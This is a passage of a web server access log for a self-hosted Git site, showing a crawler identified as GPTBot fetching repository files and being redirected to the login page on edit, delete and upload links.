[Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:15:57:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/docker-compose.yml" +[17/Feb/2026:15:57:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/docker-compose.yml" +[17/Feb/2026:15:57:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/docker-compose.yml" +[17/Feb/2026:15:58:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/docker-compose.yml" +[17/Feb/2026:15:58:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets" [Client 74.7.227.38] [Length 11078] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html" +[17/Feb/2026:15:58:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components" [Client 74.7.227.38] [Length 10836] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html" +[17/Feb/2026:15:58:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 11709] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html" +[17/Feb/2026:15:58:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/services" [Client 74.7.227.38] [Length 10181] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html" +[17/Feb/2026:15:58:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 12174] [Gzip 3.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html" +[17/Feb/2026:15:58:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/.Backup/html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html" +[17/Feb/2026:15:58:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/.Backup/html" +[17/Feb/2026:15:58:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html" +[17/Feb/2026:15:58:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html" +[17/Feb/2026:15:58:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html" +[17/Feb/2026:15:58:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html" +[17/Feb/2026:15:58:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/README.md" [Client 74.7.227.38] [Length 11572] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html" +[17/Feb/2026:15:58:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 13012] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html" +[17/Feb/2026:15:58:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/types.ts" [Client 74.7.227.38] [Length 11742] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html" +[17/Feb/2026:15:58:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets" [Client 74.7.227.38] [Length 10027] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets" +[17/Feb/2026:15:58:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/components" [Client 74.7.227.38] [Length 9788] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components" +[17/Feb/2026:15:58:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 11021] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/.gitignore" +[17/Feb/2026:15:58:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 9780] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/.gitignore" +[17/Feb/2026:15:58:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/vite.config.ts" +[17/Feb/2026:15:58:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/vite.config.ts" +[17/Feb/2026:15:58:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/.gitignore" +[17/Feb/2026:15:58:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11490] [Gzip 4.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/vite.config.ts" +[17/Feb/2026:15:58:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 9790] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/vite.config.ts" +[17/Feb/2026:15:58:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/vite.config.ts" +[17/Feb/2026:15:58:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 9780] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/App.tsx" +[17/Feb/2026:15:58:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/types.ts" [Client 74.7.227.38] [Length 11055] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/types.ts" +[17/Feb/2026:15:58:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 830] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/vite.config.ts" +[17/Feb/2026:15:58:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/README.md" [Client 74.7.227.38] [Length 11233] [Gzip 3.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/README.md" +[17/Feb/2026:15:58:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/types.ts" [Client 74.7.227.38] [Length 9786] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/types.ts" +[17/Feb/2026:15:58:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/README.md" [Client 74.7.227.38] [Length 9783] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/README.md" +[17/Feb/2026:15:58:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/services" [Client 74.7.227.38] [Length 9789] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/services" +[17/Feb/2026:15:58:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/README.md" +[17/Feb/2026:15:58:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12746] [Gzip 5.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/App.tsx" +[17/Feb/2026:15:58:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 822] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/.gitignore" +[17/Feb/2026:15:58:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/README.md" [Client 74.7.227.38] [Length 820] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/README.md" +[17/Feb/2026:15:58:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 816] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/App.tsx" +[17/Feb/2026:15:58:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/App.tsx" +[17/Feb/2026:15:58:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/types.ts" [Client 74.7.227.38] [Length 818] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/types.ts" +[17/Feb/2026:15:58:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/types.ts" +[17/Feb/2026:15:58:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/vite.config.ts" +[17/Feb/2026:15:58:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/vite.config.ts" +[17/Feb/2026:15:58:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/components" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components" +[17/Feb/2026:15:58:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/components" +[17/Feb/2026:15:58:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/assets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets" +[17/Feb/2026:15:58:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/assets" +[17/Feb/2026:15:58:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/.Backup/html/services" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/services" +[17/Feb/2026:15:58:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/.Backup/html/services" +[17/Feb/2026:15:58:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/services" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/services" +[17/Feb/2026:15:58:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/services" +[17/Feb/2026:15:58:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/vite.config.ts" +[17/Feb/2026:15:58:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/vite.config.ts" +[17/Feb/2026:15:58:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/App.tsx" +[17/Feb/2026:15:58:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/App.tsx" +[17/Feb/2026:15:58:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/App.tsx" +[17/Feb/2026:15:58:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/App.tsx" +[17/Feb/2026:15:58:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/.gitignore" +[17/Feb/2026:15:58:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/.gitignore" +[17/Feb/2026:15:58:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/types.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/types.ts" +[17/Feb/2026:15:58:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/types.ts" +[17/Feb/2026:15:58:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/README.md" +[17/Feb/2026:15:58:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/README.md" +[17/Feb/2026:15:58:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/README.md" +[17/Feb/2026:15:58:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/README.md" +[17/Feb/2026:15:58:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/assets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets" +[17/Feb/2026:15:58:25 +0000] - 200 200 